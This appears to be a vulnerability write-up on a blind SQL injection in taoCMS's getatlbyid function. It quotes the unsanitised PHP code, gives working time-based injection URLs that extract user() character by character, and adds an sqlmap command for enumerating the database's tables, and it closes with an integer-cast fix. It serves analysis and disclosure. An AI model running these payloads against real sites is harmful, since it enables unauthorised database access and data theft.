Embarrassingly, my guess is that the blind injection failed against the official website because it runs with memcache enabled (as the code below shows, the lookup result is cached under the raw $id, so a repeated payload is answered from the cache and never reaches the database)... The root cause of the "taoCMS SQL injection that ignores GPC" described at http://www.bkjia.com/Article/201406/309080.html is that the $path variable is taken from $_SERVER['QUERY_STRING'], which magic_quotes_gpc does not escape (only $_GET, $_POST and $_COOKIE are; magic_quotes has in any case been removed since PHP 5.4). The developer's fix was $path = Base::safeword($path), which escapes single quotes with addslashes. addslashes does nothing for a value that is never quoted, so the way forward is to find a numeric parameter and inject there instead. The architecture of taoCMS is rather odd: any public method of the Index class can be called through the action parameter. Requesting http://url/index.php/?path&action=getatlbyid results in the following call:
Index::getatlbyid('?path&action=getatlbyid');

static public function getatlbyid($id){
    if(!$id) return null;
    self::$_db = new Dbclass(SYS_ROOT.DB_NAME);
    if(MEMCACHE){
        self::$_mem = new Memcached(MEMCACHE);
        // the cache key is built from the raw $id, so an identical payload is served from cache
        if(!$atl = self::$_mem->get($id.'_cms')){
            // $id is concatenated straight into the WHERE clause
            $atl = self::$_db->get_one(TB."cms", 'status=1 and id='.$id, "*", 1);
            self::$_mem->set($id.'_cms', $atl);
        }
    }else{
        $atl = self::$_db->get_one(TB."cms", 'status=1 and id='.$id, "*", 1);
    }
    return $atl;
}
We can see that $id goes into the SQL query without any processing, which gives us an injection. The snag is the leading `?` of the query string: it becomes part of $id, and there is no way to close it inside the statement. Fortunately the parameters are read from $_SERVER['QUERY_STRING'], so the `?` can simply be moved behind the payload, where it no longer matters. The request then takes the form http://url/index.php/payload%23?action=getatlbyid, where %23 (`#`) comments out the remainder of the SQL statement.

The function does not output anything: the row is returned but never echoed, so only blind injection is possible. Time-based probing works:

http://demo/tao/index.php/if(ascii(substr(user(),1,1))>113,sleep(4),26)%23?action=getatlbyid    delayed
http://demo/tao/index.php/if(ascii(substr(user(),1,1))>114,sleep(4),26)%23?action=getatlbyid    normal

So the first character of user() is char(114) = 'r'. (The false branch yields 26, an id that returns a normal page.)

Blind injection by hand is too tedious. Write a transit script that forwards the injected value into the URL above and let sqlmap drive it:

./sqlmap.py -u "http://demo/tao.php?sqli=26" --technique T --dbms MySQL --prefix "" --suffix "" -D taocms --tables

--prefix "" and --suffix "" stop sqlmap from wrapping the numeric value in quoting or closing syntax of its own; --technique T restricts it to the time-based probes that this blind sink supports.
Summary: $id is passed into the SQL query unprocessed, which gives the injection.
Fix: filter $id against SQL injection. Since id is only ever compared as a number, casting it with (int) (or intval()) before it is concatenated into the WHERE clause closes this path; addslashes/safeword alone does not, because the value is never inside quotes.